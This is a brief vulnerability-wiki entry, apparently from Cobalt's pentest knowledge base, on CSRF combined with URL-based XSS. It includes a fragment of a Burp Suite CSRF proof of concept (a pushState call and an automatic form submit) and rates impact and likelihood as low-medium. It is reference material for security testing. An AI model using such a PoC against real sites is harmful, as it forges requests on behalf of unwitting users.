Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

CSRF/URL-Based XSS

POC

Send the following CSRF PoC to exploit XSS <!-- CSRF PoC - generated by Burp Suite Professional -->

history.pushState(&#39;&#39;, &#39;&#39;, &#39;/&#39;) document.forms[0].submit();

Impact

Low-Medium

Likelihood

Low-Medium